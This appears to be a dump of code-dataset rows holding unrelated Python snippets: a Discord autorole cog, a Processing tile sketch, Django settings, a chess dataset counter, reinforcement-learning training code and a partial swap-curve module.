id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
9603925 | <filename>roleutils/autorole.py
import logging
from typing import Union
import discord
from redbot.core import commands
from redbot.core.bot import Red
from .abc import MixinMeta
from .converters import FuzzyRole
from .utils import is_allowed_by_hierarchy, is_allowed_by_role_hierarchy
# Module-level logger scoped to this cog for targeted log filtering.
log = logging.getLogger("red.phenom4n4n.roleutils.autorole")


class AutoRole(MixinMeta):
    """Manage autoroles and sticky roles.

    Only command stubs are visible in this chunk: every handler body is just
    its docstring, so the actual behaviour presumably lives elsewhere in the
    package (or is unimplemented) — confirm against the rest of the repo.
    """

    async def initialize(self):
        # Cooperative-multiple-inheritance hook: log, then let the other
        # mixins in the MRO run their own initialize().
        log.debug("AutoRole Initialize")
        await super().initialize()

    # NOTE(review): `is_owner` combined with `admin_or_permissions` — the
    # owner check alone already restricts the whole group, which makes the
    # admin/permission check redundant; possibly a leftover debug guard.
    @commands.is_owner()
    @commands.admin_or_permissions(manage_roles=True)
    @commands.bot_has_permissions(manage_roles=True)
    @commands.group(name="autorole")
    async def _autorole(self, ctx: commands.Context):
        """Manage autoroles and sticky roles."""

    @_autorole.command()
    async def add(self, ctx: commands.Context, *, role: FuzzyRole):
        """Add a role to be added to all new members on join."""

    @_autorole.command()
    async def remove(self, ctx: commands.Context, *, role: Union[FuzzyRole, int]):
        """Remove an autorole."""

    @_autorole.group(name="humans")
    async def _humans(self, ctx: commands.Context):
        """Manage autoroles for humans."""

    @_humans.command(name="add")
    async def humans_add(self, ctx: commands.Context, *, role: FuzzyRole):
        """Add a role to be added to all new humans on join."""

    @_humans.command(name="remove")
    async def humans_remove(self, ctx: commands.Context, *, role: Union[FuzzyRole, int]):
        """Remove an autorole for humans."""

    @_autorole.group(name="bots")
    async def _bots(self, ctx: commands.Context):
        """Manage autoroles for bots."""

    @_bots.command(name="add")
    async def bots_add(self, ctx: commands.Context, *, role: FuzzyRole):
        """Add a role to be added to all new bots on join."""

    @_bots.command(name="remove")
    async def bots_remove(self, ctx: commands.Context, *, role: Union[FuzzyRole, int]):
        """Remove an autorole for bots."""

    @_autorole.group(invoke_without_command=True, name="sticky")
    async def _sticky(self, ctx: commands.Context, true_or_false: bool = None):
        """Toggle whether the bot should reapply roles on member joins and leaves."""

    @_sticky.command(aliases=["bl"])
    async def blacklist(self, ctx: commands.Context, *, role: FuzzyRole):
        """Blacklist a role from being reapplied on joins."""

    @_sticky.command(aliases=["unbl"])
    async def unblacklist(self, ctx: commands.Context, *, role: Union[FuzzyRole, int]):
        """Remove a role from the sticky blacklist."""

    # The listener decorators are commented out, so these handlers are inert.
    # @commands.Cog.listener()
    async def on_member_join(self, member: discord.Member):
        pass

    # @commands.Cog.listener()
    async def on_member_remove(self, member: discord.Member):
        pass
| StarcoderdataPython |
1664 | add_library('pdf')
import random
from datetime import datetime
tileCount = 20
def setup():
    """Initialise sketch state: PDF flag, stroke cap, seed, colours, alphas."""
    global savePDF, actStrokeCap, actRandomSeed, colorLeft, colorRight, alphaLeft, alphaRight
    # Start without PDF recording and with a fixed, reproducible tiling seed.
    savePDF = False
    actRandomSeed = 0
    actStrokeCap = ROUND
    # Colours for the two diagonal orientations, both fully at alpha 100.
    colorLeft, colorRight = color(197, 0, 123), color(87, 35, 129)
    alphaLeft = alphaRight = 100
def draw():
    """Render the diagonal-tile grid; optionally record the frame to a PDF."""
    global savePDF, actStrokeCap, actRandomSeed, colorLeft, colorRight, alphaLeft, alphaRight
    if savePDF:
        # Start recording this frame into a timestamped PDF file.
        beginRecord(PDF, datetime.now().strftime("%Y%m%d%H%M%S")+".pdf")
    background(255)
    smooth()
    noFill()
    strokeCap(actStrokeCap)
    # Re-seed so the same toggle pattern is redrawn every frame until the
    # seed changes (mousePressed re-rolls it).
    random.seed(actRandomSeed)
    for gridY in range(tileCount):
        for gridX in range(tileCount):
            posX = int(width/tileCount*gridX)
            posY = int(height/tileCount*gridY)
            # Randomly pick one of the two diagonal orientations per tile.
            toggle = random.randint(0,1)
            if (toggle == 0):
                # Stroke weight of the left-colour diagonal follows mouse X.
                strokeWeight(mouseX/20)
                stroke(colorLeft, alphaLeft)
                line(posX, posY, posX+width/tileCount, posY+height/tileCount)
            elif (toggle == 1):
                # Stroke weight of the right-colour diagonal follows mouse Y.
                strokeWeight(mouseY/20)
                stroke(colorRight, alphaRight)
                # NOTE(review): uses width for the vertical offset and height
                # for the horizontal one — identical on a square canvas, but
                # it looks like a transposed pair; confirm intent.
                line(posX, posY+width/tileCount, posX+height/tileCount, posY)
    if (savePDF):
        # Finish the one-frame PDF recording started at the top of draw().
        savePDF = False
        endRecord()
def mousePressed():
    """Re-roll the random seed so the next draw() produces a new tiling."""
    global savePDF, actStrokeCap, actRandomSeed, colorLeft, colorRight, alphaLeft, alphaRight
    # randrange(100001) draws uniformly from 0..100000 inclusive-exclusive+1,
    # exactly like randint(0, 100000).
    actRandomSeed = random.randrange(100001)
def keyReleased():
    """Handle keyboard shortcuts: export, stroke caps, colours and alphas."""
    global savePDF, actStrokeCap, actRandomSeed, colorLeft, colorRight, alphaLeft, alphaRight
    # 's': save the current frame as a timestamped PNG.
    if (key=='s' or key=='S'):
        saveFrame(datetime.now().strftime("%Y%m%d%H%M%S")+".png")
    # 'p': request a PDF export; draw() starts and stops the recording.
    if (key=='p' or key=='P'):
        savePDF = True
    # '1'-'3': switch the stroke cap style.
    if key == "1":
        actStrokeCap = ROUND
    elif key == "2":
        actStrokeCap = SQUARE
    elif key == "3":
        actStrokeCap = PROJECT
    # '4'/'5': toggle the left/right diagonal colour between black and a hue.
    # NOTE(review): color(323, 100, 77) / color(273, 73, 51) look like HSB
    # triples, but no colorMode(HSB, ...) call is visible in this sketch; in
    # the default RGB mode out-of-range components are clamped — confirm.
    elif (key == '4'):
        if (colorLeft == color(0)):
            colorLeft = color(323, 100, 77)
        else:
            colorLeft = color(0)
    elif (key == '5'):
        if (colorRight == color(0)):
            colorRight = color(273, 73, 51)
        else:
            colorRight = color(0)
    # '6'/'7': toggle the left/right alpha between 100 and 50.
    elif (key == '6'):
        if (alphaLeft == 100):
            alphaLeft = 50
        else:
            alphaLeft = 100
    elif (key == '7'):
        if (alphaRight == 100):
            alphaRight = 50
        else:
            alphaRight = 100
    # '0': reset cap, colours and alphas to a black default. (Plain `if`, not
    # `elif`, but key values are mutually exclusive so it behaves the same.)
    if (key == '0'):
        actStrokeCap = ROUND
        colorLeft = color(0)
        colorRight = color(0)
        alphaLeft = 100
        alphaRight = 100
| StarcoderdataPython |
6571969 | <reponame>Samples-Playgorunds/Samples.Python<gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# https://realpython.com/python-statistics/
# BUG FIX: `statistics` is used below but its import was commented out,
# which made every `statistics.*` call raise NameError at runtime. The
# other tutorial imports stay commented out because this script never
# uses them.
#import math
#import numpy as np
#import scipy.stats
import statistics

import pandas as pd

# Load the sample dataset; the 'ATV' column is summarised below.
data = pd.read_csv("/Users/katodix/Projects/HolisticWare.Core.Math.Statistics.Descriptive.Sequential/externals/Core.Math.Samples/data/Pejcic_318.csv")

# NOTE(review): these expression statements compute and discard their
# results — they only produce output in an interactive session (REPL /
# notebook). Wrap them in print(...) if script output is wanted.
data['ATV'].mean()
data.mean()
statistics.mean(data['ATV'])
statistics.harmonic_mean(data['ATV'])
# geometric_mean requires Python 3.8+.
statistics.geometric_mean(data['ATV'])
| StarcoderdataPython |
3249753 | # -*- coding: utf-8 -*-
"""
Created on Fri Jan 26 16:55:10 2018
@author: bryan.nonni
"""
import os
from selenium import webdriver

# Chrome driver location: chromedriver.exe expected next to this script.
chrome_location = os.path.join('.', 'chromedriver.exe')
print(chrome_location)

options = webdriver.ChromeOptions()
#options.add_experimental_option("", ['--ignore-certificate-errors'])
options.add_argument("--ignore-certificate-errors")
options.add_argument("--test-type")
# BUG FIX: the original line was an unterminated string literal
# (`options.binarylocation = "usr/bin/chromium`), a SyntaxError, and used a
# non-existent attribute name. ChromeOptions exposes `binary_location`, and
# the chromium binary lives at an absolute path.
options.binary_location = "/usr/bin/chromium"

# Open Google, save a screenshot, and shut the browser down.
driver = webdriver.Chrome(chrome_options=options)
driver.get('https://www.google.com')
driver.save_screenshot("screenshot.png")
driver.close()

# Driver
#Driver = webdriver.Chrome(chrome_location, chrome_options=options)
#if __name__ == "__main__":
#    print("Code is live!")
11207605 | from yunionclient.common import base
class ServerSku(base.ResourceBase):
    """Resource object wrapping a single server SKU record.

    All behaviour comes from base.ResourceBase; nothing is overridden here.
    """
    pass
class ServerSkuManager(base.StandaloneManager):
    """Manager for listing and querying server SKUs.

    Declarative configuration only; request handling is inherited from
    base.StandaloneManager (presumably using `keyword`/`keyword_plural` to
    build endpoint paths — confirm against the base class).
    """
    # Wrapper class instantiated for each returned SKU record.
    resource_class = ServerSku
    # Singular / plural resource keywords consumed by the base manager.
    keyword = 'serversku'
    keyword_plural = 'serverskus'
    # Columns displayed for regular users.
    _columns = ['ID', 'Name', 'Instance_type_family',
                'Instance_type_category', 'Cpu_core_count', 'Memory_size_mb',
                'Os_name', 'Sys_disk_resizable', 'Attached_disk_type', 'Attached_disk_size_gb',
                'Attached_disk_count', 'Data_disk_types', 'Data_disk_max_count', 'Nic_max_count',
                'Cloudregion_id', 'Provider', 'Postpaid_status', 'Prepaid_status', 'Created_at']
    # No extra admin-only columns.
    _admin_columns = []
| StarcoderdataPython |
5108842 | <reponame>Leviathan321/ChessDiagramRecognition
################################################################################
# Print number of files for each dataset
################################################################################
from squares_ids import get_squares_ids_absolute_paths
from relative_to_absolute_path import get_absolute_path
from os import listdir
from os.path import isfile, join, basename
################################################################################
################################################################################
# Set paths:
# Absolute path to the diagrams dataset, resolved relative to this file.
dataset_diagrams: str = get_absolute_path("../datasets/diagrams", __file__)
################################################################################
################################################################################
def print_status_squares() -> None:
    """Print per-directory and total counts of square images.

    Counts regular files in every dataset path returned by
    get_squares_ids_absolute_paths(), grouped into black and white squares.
    (Refactor: the original duplicated the counting loop verbatim for the
    two categories; it is extracted into _print_square_category.)
    """
    print("************************************************************")
    print("S Q U A R E S")
    print()
    paths: dict = get_squares_ids_absolute_paths()
    count_all: int = 0
    count_all += _print_square_category(paths, "black_square")
    count_all += _print_square_category(paths, "white_square")
    print()
    print("All squares:", count_all)
    print("************************************************************")


def _print_square_category(paths, category: str) -> int:
    """Print file counts for every path containing *category*; return subtotal."""
    print(category + ":")
    subtotal: int = 0
    for path in paths:
        if category in path:
            # Count only regular files; sub-directories are ignored.
            number_of_squares = len(
                [f for f in listdir(path) if isfile(join(path, f))]
            )
            subtotal += number_of_squares
            print("\t" + basename(path), ":", number_of_squares)
    return subtotal
################################################################################
################################################################################
def print_status_diagrams(dataset) -> None:
    """Print how many regular files (diagram images) live in *dataset*.

    Sub-directories inside *dataset* are not counted.
    """
    print("************************************************************")
    print("D I A G R A M S")
    print()
    diagram_count = sum(
        1 for entry in listdir(dataset) if isfile(join(dataset, entry))
    )
    print("diagrams: " + str(diagram_count))
    print("************************************************************")
################################################################################
################################################################################
def main():
    """Entry point: report the diagrams count, then the squares counts."""
    print_status_diagrams(dataset_diagrams)
    print_status_squares()
################################################################################
################################################################################
# Runs the report immediately when the module is executed/imported.
main()
| StarcoderdataPython |
1845304 | <reponame>ucsd-field-lab/namuti-webapp-template<filename>backend/nameforyourprojectbackend/nameforyourprojectbackend/settings/base.py
import os
# Project base directory: two levels up from this file
# (settings/base.py -> settings/ -> package root). Build paths with
# os.path.join(BASE_DIR, ...).
# NOTE(review): SECRET_KEY, DEBUG, ALLOWED_HOSTS and DATABASES are not set
# here — presumably they live in environment-specific settings modules that
# import this base module; confirm.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'rest_framework',
    'corsheaders',
    'api.apps.ApiConfig',
    'django.contrib.postgres'
]

# Middleware order matters; CorsMiddleware is placed before
# CommonMiddleware so CORS headers are added to early responses.
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'corsheaders.middleware.CorsMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        # 'DIRS': [os.path.join(BASE_DIR, 'src')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.template.context_processors.media',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

ROOT_URLCONF = 'nameforyourprojectbackend.urls'

WSGI_APPLICATION = 'nameforyourprojectbackend.wsgi.application'

# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization defaults.
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True

# Static files are collected into ./static and served under /static/.
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATIC_URL = '/static/'
# STATICFILES_DIRS = (
#     os.path.join(BASE_DIR, 'static'),
# )
STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)

# NOTE(review): MEDIA_URL is set but MEDIA_ROOT is not defined in this
# module — presumably set in an environment-specific settings file; confirm.
MEDIA_URL = '/recordings/'

# DRF: namespace-based API versioning, JSON in / JSON out only.
REST_FRAMEWORK = {
    'DEFAULT_VERSIONING_CLASS': 'rest_framework.versioning.NamespaceVersioning',
    'DEFAULT_RENDERER_CLASSES': (
        'rest_framework.renderers.JSONRenderer',
    ),
    'DEFAULT_PARSER_CLASSES': (
        'rest_framework.parsers.JSONParser',
    )
}

# HTTP methods permitted on cross-origin requests.
CORS_ALLOW_METHODS = (
    'DELETE',
    'GET',
    'OPTIONS',
    'PATCH',
    'POST',
    'PUT',
)

# Origins allowed to make cross-origin requests (dev frontend + deployment).
CORS_ORIGIN_WHITELIST = (
    # '192.168.99.100:3000',
    'localhost:3000',
    'nameforyourprojectbackend.ucsd.edu',
)

# CSRF_COOKIE_NAME = "XSRF-TOKEN"
# NOTE: parenthesised single string with no trailing comma — this is a plain
# str, not a one-element tuple.
CSRF_HEADER_NAME = (
    'HTTP_X_CSRFTOKEN'
)
# LOGGING = {
# 'version': 1,
# 'disable_existing_loggers': True,
# 'formatters': {
# 'standard': {
# 'format' : "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
# 'datefmt' : "%d/%b/%Y %H:%M:%S"
# },
# },
# 'handlers': {
# 'null': {
# 'level':'DEBUG',
# 'class':'django.utils.log.NullHandler',
# },
# 'logfile': {
# 'level':'DEBUG',
# 'class':'logging.handlers.RotatingFileHandler',
# 'filename': SITE_ROOT + "/logfile",
# 'maxBytes': 50000,
# 'backupCount': 2,
# 'formatter': 'standard',
# },
# 'console':{
# 'level':'INFO',
# 'class':'logging.StreamHandler',
# 'formatter': 'standard'
# },
# },
# 'loggers': {
# 'django': {
# 'handlers':['console'],
# 'propagate': True,
# 'level':'WARN',
# },
# 'django.db.backends': {
# 'handlers': ['console'],
# 'level': 'DEBUG',
# 'propagate': False,
# },
# 'MYAPP': {
# 'handlers': ['console', 'logfile'],
# 'level': 'DEBUG',
# },
# }
# }
| StarcoderdataPython |
4877275 | from algos.ddpg import DDPG
from algos.td3 import TD3
from algos.sac import SAC
import locale, os, random, torch, time
import numpy as np
from util.env import env_factory, eval_policy, train_normalizer
from util.log import create_logger
from torch.nn.utils.rnn import pad_sequence
class ReplayBuffer():
    """Flat experience replay buffer that also tracks episode boundaries.

    Transitions are stored contiguously in pre-allocated tensors.
    `trajectory_idx` records the start offset of every completed episode
    (plus the exclusive end of the last one), which lets whole episodes be
    sampled for recurrent policies.
    """

    def __init__(self, state_dim, action_dim, max_size):
        self.max_size = int(max_size)
        self.state = torch.zeros((self.max_size, state_dim))
        self.next_state = torch.zeros((self.max_size, state_dim))
        self.action = torch.zeros((self.max_size, action_dim))
        self.reward = torch.zeros((self.max_size, 1))
        self.not_done = torch.zeros((self.max_size, 1))

        # trajectory_idx[i] is the start index of episode i; a new boundary
        # is appended whenever a terminal transition is pushed.
        self.trajectory_idx = [0]
        self.trajectories = 0
        # BUG FIX: `size` was initialised to 1 (counting items + 1), which
        # (a) let sample() draw the uninitialised all-zero slot one past the
        # last stored transition and (b) made the buffer refuse the final
        # slot. It now counts exactly the number of stored transitions.
        self.size = 0

    def push(self, state, action, next_state, reward, done):
        """Append one transition; records an episode boundary when `done`."""
        if self.size == self.max_size:
            # Hard stop, as in the original design: the buffer is sized for
            # the whole training run and overflow indicates a config error.
            print("\nBuffer full.")
            exit(1)

        idx = self.size
        self.state[idx] = torch.Tensor(state)
        self.next_state[idx] = torch.Tensor(next_state)
        self.action[idx] = torch.Tensor(action)
        self.reward[idx] = reward
        self.not_done[idx] = 1 - done

        self.size += 1
        if done:
            # Exclusive end of this episode == start of the next one.
            self.trajectory_idx.append(self.size)
            self.trajectories += 1

    def sample_trajectory(self, max_len):
        """Return one complete stored episode.

        Returns (states, actions, next_states, rewards, not_dones, 1); the
        trailing 1 is the number of episodes returned. `max_len` is kept for
        interface compatibility but unused (episodes are returned whole).
        """
        # BUG FIX: was np.random.randint(0, self.trajectories - 1), which
        # could never select the most recent complete episode and raised
        # ValueError when exactly one episode was stored. randint's upper
        # bound is exclusive, so `self.trajectories` covers all episodes.
        traj_idx = np.random.randint(0, self.trajectories)
        start_idx = self.trajectory_idx[traj_idx]
        end_idx = self.trajectory_idx[traj_idx + 1]

        traj_states = self.state[start_idx:end_idx]
        next_states = self.next_state[start_idx:end_idx]
        actions = self.action[start_idx:end_idx]
        rewards = self.reward[start_idx:end_idx]
        not_dones = self.not_done[start_idx:end_idx]

        # Return an entire episode
        return traj_states, actions, next_states, rewards, not_dones, 1

    def sample(self, batch_size, sample_trajectories=False, max_len=1000):
        """Sample a training batch.

        With `sample_trajectories` True, returns `batch_size` whole episodes
        padded to a common length, shape (traj_len, batch, dim), plus a mask
        distinguishing real steps from padding. Otherwise returns a batch of
        independent transitions (mask slot is the scalar 1).
        """
        if sample_trajectories:
            # Collect raw trajectories from replay buffer
            raw_traj = [self.sample_trajectory(max_len) for _ in range(batch_size)]
            steps = sum([len(traj[0]) for traj in raw_traj])

            # Extract trajectory info into separate lists to be padded and batched
            states = [traj[0] for traj in raw_traj]
            actions = [traj[1] for traj in raw_traj]
            next_states = [traj[2] for traj in raw_traj]
            rewards = [traj[3] for traj in raw_traj]
            not_dones = [traj[4] for traj in raw_traj]

            # Get the trajectory mask for the critic (ones over real steps;
            # padding below leaves zeros elsewhere).
            traj_mask = [torch.ones_like(reward) for reward in rewards]

            # Pad all trajectories to be the same length, shape is
            # (traj_len x batch_size x dim).
            states = pad_sequence(states, batch_first=False)
            actions = pad_sequence(actions, batch_first=False)
            next_states = pad_sequence(next_states, batch_first=False)
            rewards = pad_sequence(rewards, batch_first=False)
            not_dones = pad_sequence(not_dones, batch_first=False)
            traj_mask = pad_sequence(traj_mask, batch_first=False)

            return states, actions, next_states, rewards, not_dones, steps, traj_mask
        else:
            # With the corrected `size` accounting this never indexes an
            # uninitialised slot.
            idx = np.random.randint(0, self.size, size=batch_size)
            return self.state[idx], self.action[idx], self.next_state[idx], self.reward[idx], self.not_done[idx], batch_size, 1
def collect_experience(policy, env, replay_buffer, initial_state, steps, noise=0.2, max_len=1000):
    """Take one environment step with exploration and store the transition.

    Returns (next_state, reward, done). On episode end (or when the episode
    exceeds max_len) the env is reset and the returned state is the fresh
    initial observation, with done forced True so the caller resets its
    per-episode counters.
    """
    with torch.no_grad():
        # Normalize the observation with the policy's running statistics.
        state = policy.normalize_state(torch.Tensor(initial_state))
        if noise is None:
            # No explicit noise: rely on the policy's own stochasticity.
            a = policy.forward(state, deterministic=False).numpy()
        else:
            # Deterministic action plus additive Gaussian exploration noise.
            a = policy.forward(state).numpy() + np.random.normal(0, noise, size=policy.action_dim)
    state_t1, r, done, _ = env.step(a)
    if done or steps > max_len:
        state_t1 = env.reset()
        done = True
        # Recurrent policies must clear their hidden state between episodes.
        if hasattr(policy, 'init_hidden_state'):
            policy.init_hidden_state()
    # Store the un-normalized observation; normalization happens at use time.
    replay_buffer.push(initial_state, a, state_t1.astype(np.float32), r, done)
    return state_t1, r, done
def run_experiment(args):
    """Train an off-policy agent (DDPG / TD3 / SAC) on `args.env_name`.

    Builds the environment and (recurrent or feed-forward) actor/critic
    networks, pre-trains the observation normalizer, then alternates
    environment interaction with policy updates, periodically evaluating
    and checkpointing the best actor.
    """
    from policies.critic import FF_Q, LSTM_Q
    from policies.actor import FF_Stochastic_Actor, LSTM_Stochastic_Actor, FF_Actor, LSTM_Actor

    # Locale is set so the "{:n}" format specifiers below print grouped digits.
    locale.setlocale(locale.LC_ALL, '')

    # wrapper function for creating parallelized envs
    env = env_factory(args.env_name)()

    # Seed every RNG source for reproducibility.
    random.seed(args.seed)
    np.random.seed(args.seed)
    torch.manual_seed(args.seed)
    if hasattr(env, 'seed'):
        env.seed(args.seed)

    obs_space = env.observation_space.shape[0]
    act_space = env.action_space.shape[0]

    # Buffer sized to hold the entire training run.
    replay_buff = ReplayBuffer(obs_space, act_space, args.timesteps)

    # Build recurrent (LSTM) or feed-forward networks; SAC needs a
    # stochastic bounded actor, DDPG/TD3 use a deterministic one.
    if args.recurrent:
        print('Recurrent ', end='')
        q1 = LSTM_Q(obs_space, act_space, env_name=args.env_name)
        q2 = LSTM_Q(obs_space, act_space, env_name=args.env_name)
        if args.algo == 'sac':
            actor = LSTM_Stochastic_Actor(obs_space, act_space, env_name=args.env_name, bounded=True)
        else:
            actor = LSTM_Actor(obs_space, act_space, env_name=args.env_name)
    else:
        q1 = FF_Q(obs_space, act_space, env_name=args.env_name)
        q2 = FF_Q(obs_space, act_space, env_name=args.env_name)
        if args.algo == 'sac':
            actor = FF_Stochastic_Actor(obs_space, act_space, env_name=args.env_name, bounded=True)
        else:
            actor = FF_Actor(obs_space, act_space, env_name=args.env_name)

    if args.algo == 'sac':
        print('Soft Actor-Critic')
        # SAC additionally receives the flattened observation size.
        algo = SAC(actor, q1, q2, torch.prod(torch.Tensor(env.reset().shape)), args)
    elif args.algo == 'td3':
        print('Twin-Delayed Deep Deterministic Policy Gradient')
        algo = TD3(actor, q1, q2, args)
    elif args.algo == 'ddpg':
        print('Deep Deterministic Policy Gradient')
        # DDPG uses a single critic.
        algo = DDPG(actor, q1, args)

    # Echo the run's hyperparameters.
    print("\tenv: {}".format(args.env_name))
    print("\tseed: {}".format(args.seed))
    print("\ttimesteps: {:n}".format(args.timesteps))
    print("\tactor_lr: {}".format(args.a_lr))
    print("\tcritic_lr: {}".format(args.c_lr))
    print("\tdiscount: {}".format(args.discount))
    print("\ttau: {}".format(args.tau))
    print("\tbatch_size: {}".format(args.batch_size))
    print("\twarmup period: {:n}".format(args.start_timesteps))
    print()

    iter = 0  # NOTE: shadows the builtin `iter`; counts completed episodes.
    episode_reward = 0
    episode_timesteps = 0

    # create a tensorboard logging object
    logger = create_logger(args)

    if args.save_actor is None:
        args.save_actor = os.path.join(logger.dir, 'actor.pt')

    # Keep track of some statistics for each episode
    training_start = time.time()
    episode_start = time.time()
    episode_loss = 0
    update_steps = 0
    best_reward = None

    #eval_policy(algo.actor, min_timesteps=args.prenormalize_steps, max_traj_len=args.max_traj_len, visualize=False
    # Pre-train the observation normalizer with exploratory rollouts.
    train_normalizer(algo.actor, args.prenormalize_steps, noise=algo.expl_noise)

    # Fill replay buffer, update policy until n timesteps have passed
    timesteps = 0
    state = env.reset().astype(np.float32)
    while timesteps < args.timesteps:
        # Recurrent algos need whole episodes banked; feed-forward ones
        # just need enough individual transitions.
        buffer_ready = (algo.recurrent and replay_buff.trajectories > args.batch_size) or (not algo.recurrent and replay_buff.size > args.batch_size)
        warmup = timesteps < args.start_timesteps

        state, r, done = collect_experience(algo.actor, env, replay_buff, state, episode_timesteps,
                                            max_len=args.traj_len,
                                            noise=algo.expl_noise)
        episode_reward += r
        episode_timesteps += 1
        timesteps += 1

        # Don't count episodes toward eval cadence until training can start.
        if not buffer_ready or warmup:
            iter = 0

        # Update the policy once our replay buffer is big enough
        if buffer_ready and done and not warmup:
            update_steps = 0
            # Feed-forward: one gradient update per env step this episode;
            # recurrent: a single whole-trajectory update.
            if not algo.recurrent:
                num_updates = episode_timesteps
            else:
                num_updates = 1

            losses = []
            for _ in range(num_updates):
                losses.append(algo.update_policy(replay_buff, args.batch_size, traj_len=args.traj_len))

            episode_elapsed = (time.time() - episode_start)
            episode_secs_per_sample = episode_elapsed / episode_timesteps

            # Each losses entry is (actor_loss, critic_loss, [alpha_loss,]
            # ..., steps) — assumption inferred from the indexing below;
            # confirm against the algo implementations.
            actor_loss = np.mean([loss[0] for loss in losses])
            critic_loss = np.mean([loss[1] for loss in losses])
            update_steps = sum([loss[-1] for loss in losses])

            logger.add_scalar(args.env_name + '/actor loss', actor_loss, timesteps - args.start_timesteps)
            logger.add_scalar(args.env_name + '/critic loss', critic_loss, timesteps - args.start_timesteps)
            logger.add_scalar(args.env_name + '/update steps', update_steps, timesteps - args.start_timesteps)

            if args.algo == 'sac':
                # SAC also reports the entropy-temperature (alpha) loss.
                alpha_loss = np.mean([loss[2] for loss in losses])
                logger.add_scalar(args.env_name + '/alpha loss', alpha_loss, timesteps - args.start_timesteps)

            # Rough ETA from the average wall-clock time per sample so far.
            completion = 1 - float(timesteps) / args.timesteps
            avg_sample_r = (time.time() - training_start)/timesteps
            secs_remaining = avg_sample_r * args.timesteps * completion
            hrs_remaining = int(secs_remaining//(60*60))
            min_remaining = int(secs_remaining - hrs_remaining*60*60)//60

            # Periodic evaluation; checkpoint whenever the return improves.
            if iter % args.eval_every == 0 and iter != 0:
                eval_reward = eval_policy(algo.actor, min_timesteps=1000, verbose=False, visualize=False, max_traj_len=args.traj_len)
                logger.add_scalar(args.env_name + '/return', eval_reward, timesteps - args.start_timesteps)

                print("evaluation after {:4d} episodes | return: {:7.3f} | timesteps {:9n}{:100s}".format(iter, eval_reward, timesteps - args.start_timesteps, ''))
                if best_reward is None or eval_reward > best_reward:
                    torch.save(algo.actor, args.save_actor)
                    best_reward = eval_reward
                    print("\t(best policy so far! saving to {})".format(args.save_actor))

        # Progress line; wrapped in try/except because
        # episode_secs_per_sample / hrs_remaining / min_remaining are only
        # bound after the first completed update block above.
        try:
            print("episode {:5d} | episode timestep {:5d}/{:5d} | return {:5.1f} | update timesteps: {:7n} | {:3.1f}s/1k samples | approx. {:3d}h {:02d}m remain\t\t\t\t".format(
                iter,
                episode_timesteps,
                args.traj_len,
                episode_reward,
                update_steps,
                1000*episode_secs_per_sample,
                hrs_remaining,
                min_remaining), end='\r')
        except NameError:
            pass

        if done:
            # Reset recurrent hidden state and the per-episode statistics.
            if hasattr(algo.actor, 'init_hidden_state'):
                algo.actor.init_hidden_state()
            episode_start, episode_reward, episode_timesteps, episode_loss = time.time(), 0, 0, 0
            iter += 1
| StarcoderdataPython |
1612426 | # Lint as: python3
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Methods to construct a swap curve.
Building swap curves is a core problem in mathematical finance. Swap
curves are built using the available market data in liquidly traded fixed income
products. These include LIBOR rates, interest rate swaps, forward rate
agreements (FRAs) or exchange traded futures contracts. This module contains
methods to build swap curve from market data.
The algorithm implemented here uses conjugate gradient optimization to minimize
the weighted least squares error between the input present values of the
instruments and the present values computed using the constructed swap curve.
#### References:
[1]: <NAME> and <NAME>. Interest Rate Modeling,
Volume I: Foundations and Vanilla Models. Chapter 6. 2010.
"""
import collections
import tensorflow.compat.v2 as tf
from tf_quant_finance.math import make_val_and_grad_fn
from tf_quant_finance.math import optimizer
from tf_quant_finance.math.interpolation import linear
from tf_quant_finance.rates import swap_curve_common as scc
def swap_curve_fit(float_leg_start_times,
float_leg_end_times,
float_leg_daycount_fractions,
fixed_leg_start_times,
fixed_leg_end_times,
fixed_leg_daycount_fractions,
fixed_leg_cashflows,
present_values,
present_values_settlement_times=None,
float_leg_discount_rates=None,
float_leg_discount_times=None,
fixed_leg_discount_rates=None,
fixed_leg_discount_times=None,
optimize=None,
curve_interpolator=None,
initial_curve_rates=None,
instrument_weights=None,
curve_tolerance=1e-8,
maximum_iterations=50,
dtype=None,
name=None):
"""Constructs the zero swap curve using optimization.
A zero swap curve is a function of time which gives the interest rate that
can be used to project forward rates at arbitrary `t` for the valuation of
interest rate securities.
